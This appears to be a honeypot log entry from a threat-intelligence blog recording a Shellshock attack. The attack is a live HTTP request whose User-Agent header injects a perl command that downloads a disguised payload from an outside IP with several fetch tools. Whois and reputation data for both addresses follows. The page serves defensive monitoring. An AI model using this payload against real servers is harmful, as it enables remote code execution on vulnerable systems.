Donnerstag, 21. Januar 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois